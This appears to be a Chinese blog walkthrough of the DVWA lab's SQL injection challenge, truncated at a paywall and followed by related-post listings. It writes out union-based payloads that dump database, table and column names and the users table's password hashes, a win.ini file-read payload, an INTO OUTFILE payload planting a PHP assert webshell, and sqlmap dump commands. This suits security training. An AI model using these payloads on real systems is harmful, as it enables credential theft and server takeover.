DVWA通关--SQL注入(SQL Injection)

最新推荐文章于 2026-06-02 19:56:50 发布
原创 最新推荐文章于 2026-06-02 19:56:50 发布 · 1.8w 阅读 · 168
标签
#mysql #网络安全 #靶机 #sql

目录

LOW

通关步骤

一、手工注入

二、sqlmap注入

代码分析

MEDIUM

通关步骤

方法一、手工注入

方法二、sqlmap注入

代码分析

HIGH

通关步骤

方法一、手工注入

方法二、sqlmap注入

代码分析

IMPOSSIBLE

代码分析

总结

A.有回显的手工SQL注入步骤

B.sqlmap注入

C.SQL注入防御

LOW

通关步骤

一、手工注入

1、找闭合

输入1'    报错

输入1'',不报错,说明闭合是单引号

2、确定列数

输入1' order by 2#,返回正确结果

输入1' order by 3#,报错,说明只有两列

3、爆库

输入1' union select 1,database()#

得到库名dvwa

4、爆表

输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

或者1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

或者1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#     (0x64767761是dvwa的ascii码)

得到表guestbook和users,猜测用户名和密码在users中

插一句题外话,这一步的时候一开始遇到了下图这样的报错。询问网络,网络给了我这个链接,sql注入时union出错(Illegal mix of collations for operation UNION),按照这个修改了dvwa数据库users表的字段字符规则就好了。

正常视图Ctrl+D可以进入修改字段字符规则的视图。

5、爆列

输入1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#

我用navicat看了一下,dvwa的users表没有这么多列,我怀疑可能是别的数据库里面也有叫users的表,把那些表的列也打出来了。所以这边还得加个数据库名的限制

输入1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#

或者1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x64767761#

用户名和密码的列名应该分别是user和password

6、得到数据库内容:

输入1' union select group_concat(user),group_concat(password) from users#

得到5个用户:admin,gordonb,1337,pablo,smithy

5个md5密码:5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

拿到网上md5解密一下,分别是:password,abc123,charley,letmein,password

7、读文件

输入1' union select 1,load_file('C:/Windows/win.ini')#

8、写webshell

输入1' union select 1,'<?php assert($_POST[a]);?>' into outfile 'C:/phpstudy_pro/WWW/DVWA/hackable/uploads/sh.php'#

或者1' union select 1,0x3c3f7068702061737365727428245f504f53545b615d293b3f3e into outfile 'C:/phpstudy_pro/WWW/DVWA/hackable/uploads/sh.php'#

一开始报错

询问了互联网之后找到了解决方法,如下图这样在mysql配置文件中增加一行secure_file_priv=

这就表示不限制mysql写入文件的目录了

再输入上述payload,虽然有报错,但是服务器上一看,webshell已经写好了。

如果想要确认webshell确实写入了,可以再次输入payload,报错消失或者报错消息提示文件已存在,说明webshell写入成功。

服务器上写入的webshell

二、sqlmap注入

1、找注入点

命令行输入以下命令,得到注入点和payload

python sqlmap.py -u "http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4"

注意一定要用双引号,url不用引号或者用单引号的时候,会报如下错误。如果cookie不用双引号会跳转到登录页面:不用引号会识别不到cookie的设置,用单引号的时候会问要不要合并网站新提供的cookie和sqlmap设置的cookie。

2、爆库

命令行输入以下命令,得到所有可访问的数据库

python sqlmap.py -u "http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4" -dbs

命令行输入以下命令,得到当前数据库

python sqlmap.py -u "http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4" --current-db

3、爆表

命令行输入以下命令,得到数据库dvwa的所有表

python sqlmap.py -u "http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4" --tables -D dvwa

当然,如果不用-D指定数据库,得到的将是所有可访问的数据库的所有表

4、爆列

命令行输入以下命令,得到数据库dvwa表users的所有列

python sqlmap.py -u "http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4" --columns -D dvwa -T users

5、得到用户名和密码

命令行输入以下命令,得到user和password字段的值

python sqlmap.py -u "http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4" --dump -D dvwa -T users -C "user,password"

哇哦,直接识别出密码是md5,并且解密了呢

6、写马

方法一、--os-shell

(1)命令行输入以下命令,进入sql-shell

python sqlmap.p

最低0.47元/天 解锁文章
DVWA-------简单的SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA靶场通关SQL Injection
sunxueer的博客
07-19 1480
SQL Injection 以下ip均为dwva靶场的ip地址,这里我搭建在虚拟机win2008中 一. low 1. 求闭合字符 输入1 1' and 1=1 # 可能存在单引号sql注入 2. 求列数 1' and 1=1 order by 2# 1' and 1=1 order by 3# 说明有两列 3. 求显示位 1' and 1=2 union select 1,2 # 4. 爆数据名 1' and 1=2 union select 1,database()
DVWA靶场通关——SQL Injection
oyzz120的博客
05-02 447
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题。
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 7558
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
DVWA通过攻略之SQL注入
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA——SQL注入
qq_62803993的博客
01-08 2782
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
网络安全 DVWA通关指南 SQL Injection(SQL注入)
YueXuan_521的博客
06-17 3351
Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。布尔型盲注:根据返回页面判断条件真假时间型盲注:用页面返回时间是否增加判断是否存在注入基于错误的注入:页面会返回错误信息联合查询注入:可以使用union的情况下堆查询注入:可以同时执行多条语句使用参数化查询。数据库服务器不会把参数的内容当作SQL指令的一部分来拼接执行;而是在数据库完成SQL指令的编译后才套用参数运行(预编译)
DVWA靶场通关笔记-SQL注入(SQL Injection Impossible级别)
mooyuan的网络安全博客
08-31 1460
本文分析了DVWA靶场SQL注入Impossible级别的防护机制。源码采用多重安全措施:1)参数化查询(PDO预处理语句)分离代码与数据;2)严格数字类型验证(is_numeric);3)Anti-CSRF令牌防止伪造请求;4)结果行数限制(LIMIT 1)。这些措施形成纵深防御体系,使注入攻击"不可能"实现:预编译固定SQL结构、强制类型转换过滤非数字输入、令牌验证确保请求合法性、行数限制防止数据泄露。该实现展示SQL注入防护的最佳实践方案。
DVWA靶场通关笔记-SQL注入(SQL Injection Medium级别)
mooyuan的网络安全博客
05-15 1251
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA靶场通关笔记-SQL注入(SQL Injection low级别)
mooyuan的网络安全博客
07-07 1070
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWASQL InjectionSQL 注入通关教程
weixin_30527551的博客
07-28 907
日期:2019-07-28 20:43:48 更新: 作者:Bay0net 介绍: 0x00、基本信息 关于 mysql 相关的注入,传送门。 SQL 注入漏洞之 mysql - Bay0net - 博客园 0x01、Low Security Level 查看源码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { ...
SQL 布尔盲注
qq_42378173的博客
10-11 1527
SQL 布尔盲注
DVWA靶场进行SQL注入————(LOW)
weixin_51334173的博客
04-06 3344
当Web应用程序未正确过滤用户输入,直接将输入拼接到SQL查询语句中时,攻击者可以构造恶意输入,篡改原始SQL逻辑,从而执行非预期的数据库操作(如窃取数据、删除表、绕过登录等)。
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 8378
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入
DVWA-----SQL Injection(SQL手工注入
m0_65712192的博客
11-21 1万+
DVWA-----SQL Injection(SQL手工注入
DVWA靶场通关笔记-SQL注入(SQL Injection High级别)
mooyuan的网络安全博客
07-07 1385
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对高级High级别的关卡进行渗透实战。
DVWA 靶场通关笔记:SQL InjectionSQL 注入
最新发布
2603_95206628的博客
06-02 253
DVWA 是 Web 安全入门必练的靶场,它把 SQL 注入、XSS 这些常见漏洞按 Low 到 High 难度分级,能帮新手直观理解漏洞原理和防御手段。输入单引号 ',页面直接报错,证明单引号提前闭合了原 SQL 语句,破坏了语句结构,确认存在字符型 SQL 注入。这篇笔记记录我通关 SQL 注入模块的过程,重点讲怎么发现漏洞、怎么绕过防御,以及每一步用到的关键攻击代码。进入 DVWASQL 注入模块,在输入框中输入特殊符号,用来破坏原有的 SQL 查询语句结构。第二步:验证万能密码(永真条件)
DVWA通关手册
Cccchuan_的博客
07-20 1855
我们查看源代码发现 step1是通过密钥要求用户输入验证码 step2才是修改数据库密码所以我们直接使用bp进行抓包将step1修改为step2。首先我们先尝试ping一下本地127.0.0.||dir 或者127.0.0.||ipconfig 使它前面的命令错误执行下一条命令。查看源代码发现做了限制只能上传png后缀和jpeg后缀的文件我们直接将木马文件改为png 使用bp进行修改为php 上传成功。抓包发送到重放器中,发现出现了新的value值接下来使用新的伪造url进行访问。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值